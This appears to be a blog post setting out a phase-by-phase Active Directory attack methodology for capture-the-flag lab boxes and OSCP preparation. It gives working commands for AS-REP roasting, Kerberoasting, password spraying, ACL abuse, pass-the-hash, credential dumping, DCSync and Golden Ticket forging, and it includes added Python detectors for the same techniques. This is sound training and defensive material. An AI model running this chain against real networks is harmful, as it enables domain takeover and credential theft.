Every AD box follows the same pattern. You start with nothing, you find a crack, you widen it, you own the domain. The chain is predictable. What changes is where each link breaks.

This is the methodology I follow on every AD box. Built from doing boxes like Active, Forest, Blackfield, and a bunch of others. Not theory — what I actually run.


Phase 0 — Setup

Before touching the box. 30 seconds of setup that prevents 30 minutes of confusion later.

Add the Domain to /etc/hosts

echo "$IP domain.htb dc01.domain.htb" | sudo tee -a /etc/hosts

Always add both the domain name and the DC hostname. Kerberos authentication requires proper hostname resolution. If your tools are failing with weird errors, check /etc/hosts first. I’ve wasted embarrassing amounts of time on this.

Sync Your Clock

sudo ntpdate -s $IP

Kerberos is time-sensitive. If your clock is more than 5 minutes off from the DC, authentication fails. No useful error message — just fails. Sync before you start.

Create Your Working Directory

mkdir -p {scans,loot,bloodhound}

You’re going to collect a lot of output. Stay organized or drown.


Phase 1 — No Credentials

You have nothing. The goal is simple: get a username, get a password, get anything.

1.1 — Null Session Enumeration

Try everything unauthenticated. Something usually talks.

# SMB null session
crackmapexec smb $IP -u '' -p ''
smbclient -N -L //$IP/
smbmap -H $IP -u '' -p ''

# RPC null session
rpcclient -U '' -N $IP
> enumdomusers
> enumdomgroups
> querydispinfo

# LDAP anonymous bind
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=htb"

What I’m hunting for: Usernames. That’s the priority. One valid username opens doors.

On Forest, null RPC gave me the full user list. That was the entire foothold — AS-REP Roasting one of those users.

1.2 — User Enumeration via Kerberos

If null sessions give you nothing, Kerberos will often confirm valid usernames without triggering lockouts.

kerbrute userenum -d domain.htb --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Valid users return a different response than invalid ones. No lockout risk. No failed logon events for valid users.

1.3 — AS-REP Roasting (Pre-Auth Disabled)

Once you have usernames — even just a few — try this immediately.

impacket-GetNPUsers domain.htb/ -dc-ip $IP -usersfile users.txt -no-pass -format hashcat

If any account has “Do not require Kerberos preauthentication” → you get a hash. Crack it.

hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

This was the path on Forest. Null RPC → user list → AS-REP Roast → first creds. Clean chain.

1.4 — SMB Share Enumeration (Guest/Anonymous)

Some shares are readable without creds. Or with guest access.

smbmap -H $IP -u 'guest' -p ''
crackmapexec smb $IP -u 'guest' -p '' --shares

On Active, the Replication share was readable anonymously. Had a Groups.xml file with a GPP password. That was the foothold.

Always download and inspect everything in readable shares:

smbget -R smb://$IP/sharename/

Look for:

  • GPP files (Groups.xml) — contain encrypted passwords, decryptable with gpp-decrypt
  • Scripts — logon scripts, batch files, PowerShell scripts with hardcoded creds
  • Config files — web.config, connection strings, anything with credentials
  • Documentation — password policies, default passwords, onboarding docs
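The defender's counterpart of the share hunt above, as an added example that is not part of the original post: a scanner that walks a copy of SYSVOL (or any downloaded share) and reports every GPP XML element still carrying a non-empty cpassword attribute, which is what gpp-decrypt feeds on. The directory layout, file names, clsid/GUID strings and the cpassword value are constructed placeholders; the script only flags files, it decrypts nothing.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample: a minimal Groups.xml like the ones GPP leaves under SYSVOL.
# The cpassword value and the clsid/GUID strings are placeholders, not real data.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{PLACEHOLDER-CLSID}">
  <User clsid="{PLACEHOLDER-CLSID}" name="domain.htb\\svc_example" changed="2026-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD_BLOB" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="domain.htb\\svc_example"/>
  </User>
</Groups>
"""

def build_sample_sysvol():
    """Create a throwaway tree shaped like SYSVOL\\Policies so the scanner has input."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpp_dir = os.path.join(root, "Policies", "{PLACEHOLDER-GUID}", "MACHINE", "Preferences", "Groups")
    os.makedirs(gpp_dir)
    with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    # A second preference file whose cpassword is empty: attribute present, no stored secret
    with open(os.path.join(root, "Policies", "Drives.xml"), "w", encoding="utf-8") as fh:
        fh.write('<Drives><Drive><Properties cpassword="" userName="x"/></Drive></Drives>')
    return root

def find_gpp_passwords(root):
    """Walk a SYSVOL copy and report every XML element carrying a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # not every XML under SYSVOL is well-formed; skip it rather than crash
            for elem in tree.iter():  # any element: Groups, Services, Drives, ScheduledTasks...
                if elem.attrib.get("cpassword"):  # empty attribute means nothing stored
                    findings.append({"file": os.path.relpath(path, root), "tag": elem.tag,
                                     "user": elem.attrib.get("userName", elem.attrib.get("name", "?"))})
    return findings

if __name__ == "__main__":
    for f in find_gpp_passwords(build_sample_sysvol()):
        print(f"{f['file']}: <{f['tag']}> stores a cpassword for {f['user']}")
```

Point it at a mounted or downloaded share root instead of build_sample_sysvol() to audit a real tree; any hit is a secret to rotate and a policy to clean up.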

1.5 — SNMP Walk

If UDP 161 is open:

snmpwalk -v2c -c public $IP 1.3.6.1

SNMP can dump running processes, installed software, sometimes even command lines with credentials in them.

1.6 — DNS Zone Transfer

dig axfr @$IP domain.htb

Reveals subdomains, hostnames, sometimes other DCs or servers you didn’t know existed.

Decision Point — End of Phase 1

If you have credentials → Phase 2. If you have usernames but no passwords → password spray.

# Password spraying (careful with lockout!)
crackmapexec smb $IP -u users.txt -p 'Season2026!' --continue-on-success

Passwords to try: Welcome1, Password123, CompanyName2026!, Season+Year+!. Check the password policy first if you can:

crackmapexec smb $IP -u '' -p '' --pass-pol
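From the defender's side of the spray above, an added example that is not from the original post: a detector over failed-logon records that flags a source address failing against many distinct accounts inside one window, the fan-out pattern --continue-on-success produces. The key=value line format, timestamps, names and addresses are all constructed for the example; a real 4625/4771 export needs its own parser.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified key=value form (not a real Windows event export).
# 4771 = Kerberos pre-auth failed (0x18: bad password), 4625 = logon failed (0xC000006D).
SAMPLE_EVENTS = """\
2026-03-01T09:00:01 EventID=4771 TargetUser=alice Client=10.10.14.5 Status=0x18
2026-03-01T09:00:02 EventID=4771 TargetUser=bob Client=10.10.14.5 Status=0x18
2026-03-01T09:00:02 EventID=4771 TargetUser=carol Client=10.10.14.5 Status=0x18
2026-03-01T09:00:03 EventID=4625 TargetUser=dave Client=10.10.14.5 Status=0xC000006D
2026-03-01T09:00:03 EventID=4625 TargetUser=erin Client=10.10.14.5 Status=0xC000006D
2026-03-01T09:00:04 EventID=4771 TargetUser=frank Client=10.10.14.5 Status=0x18
2026-03-01T09:05:00 EventID=4625 TargetUser=alice Client=10.10.20.7 Status=0xC000006D
2026-03-01T09:05:30 EventID=4625 TargetUser=alice Client=10.10.20.7 Status=0xC000006D
2026-03-01T09:30:00 EventID=4771 TargetUser=grace Client=10.10.14.5 Status=0x18
"""

FAILURE_EVENTS = {"4771", "4625"}  # a spray shows up in either, depending on the protocol used

def parse_events(text):
    """Turn the sample lines into dicts with a parsed timestamp."""
    events = []
    for line in text.splitlines():
        ts, *fields = line.split()
        rec = dict(f.split("=", 1) for f in fields)
        rec["time"] = datetime.fromisoformat(ts)
        events.append(rec)
    return events

def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Flag a client that fails against >= min_users distinct accounts inside one window.
    The signal is user fan-out per source; repeated failures on one account are not a spray."""
    by_client = defaultdict(list)
    for e in events:
        if e.get("EventID") in FAILURE_EVENTS:
            by_client[e["Client"]].append(e)
    alerts = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):  # slide the window from each failure in turn
            users = {e["TargetUser"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(users) >= min_users:
                alerts[client] = sorted(users)
                break
    return alerts

if __name__ == "__main__":
    for client, users in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible spray from {client}: {len(users)} accounts {users}")
```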

If you have nothing at all → check web services, check for other attack vectors. Sometimes the AD foothold comes through a web app on the same box.


Phase 2 — First Credentials

You have a domain username and password. The game changes completely.

2.1 — Validate and Test Access

First, confirm what your creds can do.

# Test creds across services
crackmapexec smb $IP -u 'user' -p 'password'
crackmapexec winrm $IP -u 'user' -p 'password'
crackmapexec mssql $IP -u 'user' -p 'password'
crackmapexec ldap $IP -u 'user' -p 'password'

That (Pwn3d!) tag on WinRM means you have shell access. If you see it → evil-winrm in immediately.

evil-winrm -i $IP -u 'user' -p 'password'

2.2 — BloodHound Collection

Run this the moment you have valid creds. Not later. Now.

bloodhound-python -u 'user' -p 'password' -d domain.htb -ns $IP -c all

This collects users, groups, sessions, ACLs, trusts — everything. Import the JSON files into BloodHound.

What to look for in BloodHound:

  1. “Shortest Path to Domain Admin” — obvious first check
  2. “Shortest Path from Owned Principals” — mark your user as owned first
  3. Kerberoastable accounts — check what SPNs exist
  4. Users with DCSync rights
  5. Accounts with dangerous permissions — GenericAll, GenericWrite, WriteDACL, ForceChangePassword, AddMember

On Blackfield, BloodHound showed that my compromised user had ForceChangePassword rights on another account. That was the entire privilege escalation path. Would have taken forever to find manually.

2.3 — Kerberoasting

Authenticated now. Target service accounts with SPNs.

impacket-GetUserSPNs domain.htb/user:password -dc-ip $IP -request -outputfile kerberoast.hash

Crack the hashes:

hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt

Service accounts often have weak passwords and high privileges. On Active, Kerberoasting the Administrator account’s SPN gave me the domain. Straight from first creds to DA.

Prioritize cracking: Accounts in Domain Admins or with admin-level access (BloodHound tells you this).

2.4 — Authenticated Share Enumeration

You can see more shares now.

smbmap -H $IP -u 'user' -p 'password'
crackmapexec smb $IP -u 'user' -p 'password' --shares

Look for new shares that weren’t visible before. SYSVOL and NETLOGON are always worth checking:

smbclient //$IP/SYSVOL -U 'user%password'
smbclient //$IP/NETLOGON -U 'user%password'

SYSVOL contains group policies. NETLOGON contains logon scripts. Both can contain credentials.

2.5 — Authenticated LDAP Dump

# All users with details
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" '(objectClass=person)' sAMAccountName description memberOf servicePrincipalName

# Computers
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" '(objectClass=computer)' cn operatingSystem

Check description fields. Admins put passwords in there more often than you’d think.
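The audit view of sections 1.3, 2.3 and 2.5 together, as an added example not taken from the post: given the attributes an authenticated LDAP dump returns, flag accounts with pre-authentication disabled, accounts that carry an SPN (privileged ones called out separately) and description fields that mention a password. The sample user records, group names and the password-hint word list are constructed assumptions; the userAccountControl bit values are the documented ones.

```python
# userAccountControl bits that matter here (documented flag values)
DONT_REQ_PREAUTH = 0x400000   # set => AS-REP roastable
PASSWD_NOTREQD = 0x0020
ACCOUNTDISABLE = 0x0002
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Account Operators"}
PASSWORD_HINTS = ("pass", "pwd", "cred")  # crude heuristic for description fields; tune as needed

# Constructed sample of what an authenticated LDAP dump returns; not from a real domain.
SAMPLE_USERS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "description": "",
     "servicePrincipalName": ["CIFS/dc01.domain.htb"], "memberOf": ["CN=Domain Admins,CN=Users,DC=domain,DC=htb"]},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200, "description": "",
     "servicePrincipalName": ["HTTP/web01.domain.htb"], "memberOf": []},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200 | DONT_REQ_PREAUTH, "description": "",
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "tmp_contractor", "userAccountControl": 0x200, "servicePrincipalName": [],
     "memberOf": [], "description": "temp account, pwd is in the onboarding ticket"},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x200 | ACCOUNTDISABLE | DONT_REQ_PREAUTH,
     "servicePrincipalName": ["MSSQLSvc/db01.domain.htb:1433"], "memberOf": [], "description": ""},
]

def cn_of(dn):
    """'CN=Domain Admins,CN=Users,DC=...' -> 'Domain Admins'."""
    return dn.split(",")[0].split("=", 1)[-1]

def audit_users(users):
    """Return (sAMAccountName, finding) pairs for the weaknesses the AD chain above relies on."""
    findings = []
    for u in users:
        name, uac = u["sAMAccountName"], u["userAccountControl"]
        if uac & ACCOUNTDISABLE:
            continue  # a disabled account can be neither roasted nor logged on with
        groups = {cn_of(g) for g in u.get("memberOf", [])}
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "pre-auth disabled: AS-REP roastable"))
        if uac & PASSWD_NOTREQD:
            findings.append((name, "PASSWD_NOTREQD set: empty password allowed"))
        if u.get("servicePrincipalName"):
            sev = "privileged " if groups & PRIVILEGED_GROUPS else ""
            findings.append((name, f"{sev}account has an SPN: Kerberoastable"))
        if any(h in u.get("description", "").lower() for h in PASSWORD_HINTS):
            findings.append((name, "description mentions a password"))
    return findings

if __name__ == "__main__":
    for name, why in audit_users(SAMPLE_USERS):
        print(f"{name}: {why}")
```

The privileged-SPN finding is the Active pattern from 2.3: an SPN on a Domain Admin turns one TGS request into a crackable DA hash, so that row is the first one to fix.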

2.6 — ACL Abuse

BloodHound found dangerous permissions? Time to exploit them.

GenericAll on a user:

# Reset their password
net rpc password "targetuser" "NewPass123!" -U "domain.htb/user%password" -S $IP

GenericWrite on a user:

# Set SPN for targeted Kerberoasting
impacket-addspn -u 'domain.htb/user' -p 'password' -t 'targetuser' -s 'HTTP/fake' "dc01.domain.htb"
# Then Kerberoast them

WriteDACL:

# Grant yourself DCSync rights
impacket-dacledit -action 'write' -rights 'DCSync' -principal 'user' -target-dn 'DC=domain,DC=htb' "domain.htb/user:password"

ForceChangePassword:

rpcclient -U 'user%password' $IP
> setuserinfo2 targetuser 23 'NewPass123!'

AddMember on a group:

net rpc group addmem "Target Group" "user" -U "domain.htb/user%password" -S $IP

Decision Point — End of Phase 2

Got admin creds? → Phase 4 (Domain Compromise). Got another user’s creds? → Repeat Phase 2 with new user, check what they can access. Got local admin on a machine? → Phase 3 (Lateral Movement). Stuck? → Check BloodHound again. Try different queries. Look at group memberships harder.


Phase 3 — Lateral Movement

You have credentials (password or hash) and need to move to other machines.

3.1 — Choose Your Tool

Decision tree for remote execution:

  • Have password + WinRM open (5985)? → evil-winrm (cleanest shell)
  • Have hash + WinRM open? → evil-winrm -H <hash> (Pass the Hash)
  • Have password + no WinRM? → impacket-psexec (requires admin, drops to SYSTEM)
  • Have hash + no WinRM? → impacket-psexec -hashes :NTLM_HASH (PtH)
  • Need stealth? → impacket-wmiexec (less noisy than psexec)
  • psexec failing? → impacket-smbexec or impacket-atexec as alternatives

# Evil-WinRM with password
evil-winrm -i $TARGET -u 'admin' -p 'password'

# Evil-WinRM with hash (Pass the Hash)
evil-winrm -i $TARGET -u 'admin' -H 'NTLM_HASH'

# PsExec with password
impacket-psexec domain.htb/admin:password@$TARGET

# PsExec with hash
impacket-psexec -hashes :NTLM_HASH domain.htb/admin@$TARGET

# WMIExec (less noisy)
impacket-wmiexec domain.htb/admin:password@$TARGET

3.2 — Credential Harvesting on Compromised Hosts

Once on a machine, harvest everything.

# Dump SAM (local accounts)
impacket-secretsdump admin:password@$TARGET

# Or from a shell:
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Download and extract offline:
impacket-secretsdump -sam sam.bak -system system.bak LOCAL

Look for:

  • Local admin hashes (reused across machines?)
  • Cached domain credentials
  • LSA secrets

3.3 — Credential Reuse

The #1 lateral movement technique. Try every credential you have against every machine.

# Spray a hash across all hosts
crackmapexec smb targets.txt -u 'admin' -H 'NTLM_HASH' --continue-on-success

Local admin password reuse is extremely common. One hash often gives you multiple machines.

3.4 — Token / Session Abuse (From a Shell)

If you have a shell on a machine where a privileged user is logged in:

# Check for tokens (requires SeImpersonatePrivilege)
# Use tools like Rubeus, Incognito, or PrintSpoofer
whoami /priv

If you have SeImpersonatePrivilege → Potato attacks (PrintSpoofer, GodPotato, etc.) for SYSTEM.


Phase 4 — Domain Compromise

You have Domain Admin equivalent access. Time to prove it.

4.1 — DCSync

The cleanest way to dump all domain hashes. Requires replication rights (Domain Admins have this by default).

impacket-secretsdump domain.htb/admin:password@$DC_IP

This dumps:

  • All domain user NTLM hashes (including krbtgt)
  • All domain computer hashes
  • Kerberos keys

You want the Administrator NTLM hash and the krbtgt hash.

# DCSync just the Administrator
impacket-secretsdump -just-dc-user Administrator domain.htb/admin:password@$DC_IP

# DCSync just krbtgt (for Golden Ticket)
impacket-secretsdump -just-dc-user krbtgt domain.htb/admin:password@$DC_IP
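A detection counterpart to DCSync, added here and not part of the original post: 4662 directory-access events that carry the replication control-access GUIDs are routine from domain controllers and directory sync services, and suspicious from anyone else. The sample records, account names and allow-list are constructed (the key=value form is a simplification of the real event); the GUIDs are the documented extended rights. It assumes 4662 auditing is already enabled on the domain object.

```python
# Control-access GUIDs that grant directory replication (documented extended rights)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed 4662 records in a simplified key=value form (not a real event export).
# Properties carries the access GUIDs requested; the last record uses an all-zero placeholder GUID.
SAMPLE_4662 = """\
EventID=4662 Subject=DOMAIN\\DC01$ ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 Subject=DOMAIN\\DC02$ ObjectType=domainDNS Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 Subject=DOMAIN\\jsmith ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 Subject=DOMAIN\\svc_aad ObjectType=domainDNS Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 Subject=DOMAIN\\jsmith ObjectType=user Properties=00000000-0000-0000-0000-000000000000
"""

# Principals expected to replicate: domain controllers and directory sync services (constructed)
KNOWN_REPLICATORS = {"DOMAIN\\DC01$", "DOMAIN\\DC02$", "DOMAIN\\svc_aad"}

def parse_4662(text):
    """Parse the sample lines; Properties becomes a list of lower-cased GUIDs."""
    recs = []
    for line in text.splitlines():
        rec = dict(f.split("=", 1) for f in line.split())
        rec["Properties"] = rec["Properties"].lower().split(";")
        recs.append(rec)
    return recs

def detect_dcsync(records, known=KNOWN_REPLICATORS):
    """Flag any principal outside the allow-list that exercises replication rights
    on the domain naming context: that is exactly what a DCSync looks like to the DC."""
    alerts = []
    for r in records:
        if r.get("EventID") != "4662" or r.get("ObjectType") != "domainDNS":
            continue
        rights = [REPLICATION_RIGHTS[g] for g in r["Properties"] if g in REPLICATION_RIGHTS]
        if rights and r["Subject"] not in known:
            alerts.append((r["Subject"], rights))
    return alerts

if __name__ == "__main__":
    for subject, rights in detect_dcsync(parse_4662(SAMPLE_4662)):
        print(f"{subject} requested {', '.join(rights)} on the domain object")
```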

4.2 — NTDS.dit Extraction

Alternative to DCSync. Grab the database file directly.

# From an admin shell on the DC
# Create a shadow copy
vssadmin create shadow /for=C:

# Copy NTDS.dit from the shadow
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\system.bak

# Download both files, then extract offline
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL

4.3 — Golden Ticket

With the krbtgt hash, you can forge tickets for any user. Persistence that survives password resets (except krbtgt reset).

# Get domain SID
impacket-lookupsid domain.htb/admin:password@$DC_IP

# Forge Golden Ticket
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain domain.htb Administrator

# Use it
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass domain.htb/Administrator@dc01.domain.htb

For OSCP, DCSync is usually enough to prove domain compromise. Golden Ticket is good to understand but overkill for most exam scenarios.

4.4 — Pass the Hash to Domain Controller

If you have the DA NTLM hash, just use it directly.

# Shell on the DC
impacket-psexec -hashes :DA_NTLM_HASH domain.htb/Administrator@$DC_IP
evil-winrm -i $DC_IP -u 'Administrator' -H 'DA_NTLM_HASH'

Simplest path. Hash from DCSync → PtH → shell on DC → proof.txt.


The Full Chain — Visual

Phase 1 (No Creds)
├── Null sessions → usernames
├── Kerberos user enum → usernames
├── AS-REP Roasting → password hash
├── Anonymous shares → credentials/info
├── SNMP/DNS → info gathering
└── Password spraying → first creds

Phase 2 (First Creds)
├── BloodHound → attack paths
├── Kerberoasting → service account hashes
├── Share enumeration → more creds/info
├── LDAP dump → users, descriptions, groups
├── ACL abuse → privilege escalation
└── Credential reuse → more access

Phase 3 (Lateral Movement)
├── Pass the Hash → other machines
├── Evil-WinRM → shells
├── PsExec/WMIExec → shells
├── SAM/LSA dumps → more hashes
└── Token abuse → higher privileges

Phase 4 (Domain Compromise)
├── DCSync → all hashes
├── NTDS.dit → offline extraction
├── Golden Ticket → persistence
└── PtH as DA → proof.txt

Common Mistakes I’ve Made on AD Boxes

  1. Not running BloodHound immediately. I used to manually enumerate after getting creds. BloodHound shows paths in seconds that take hours to find manually. Run it first. Always.

  2. Forgetting to sync time. Kerberos tools fail silently or with cryptic errors when clocks are out of sync. ntpdate before starting.

  3. Not checking ACLs. The path to DA is often through ACL abuse, not direct exploitation. BloodHound’s edge analysis is where the gold is.

  4. Trying to crack everything. Not every Kerberoast hash will crack. If it doesn’t crack in 5 minutes with rockyou, move on and look for another path.

  5. Ignoring password reuse. One set of creds should be tested against every service, every machine. crackmapexec with --continue-on-success across all discovered hosts.

  6. Not adding discovered hostnames to /etc/hosts. Every hostname you find in BloodHound or LDAP — add it. Some tools require proper name resolution.


Cheat Sheet — Tools by Phase

Phase  Tool                   Purpose
0      ntpdate                Clock sync
1      crackmapexec           Null sessions, spraying
1      kerbrute               User enumeration
1      impacket-GetNPUsers    AS-REP Roasting
1      enum4linux             SMB enumeration
2      bloodhound-python      AD data collection
2      impacket-GetUserSPNs   Kerberoasting
2      ldapsearch             LDAP enumeration
2      smbmap                 Share enumeration
3      evil-winrm             Remote shell (WinRM)
3      impacket-psexec        Remote shell (SMB)
3      impacket-wmiexec       Remote shell (WMI)
3      impacket-secretsdump   Credential dumping
4      impacket-secretsdump   DCSync
4      impacket-ticketer      Golden Ticket

The chain is always the same: enumerate → find a crack → escalate → repeat until DA. What changes is where you find each crack. BloodHound and methodical enumeration find it faster than guessing ever will.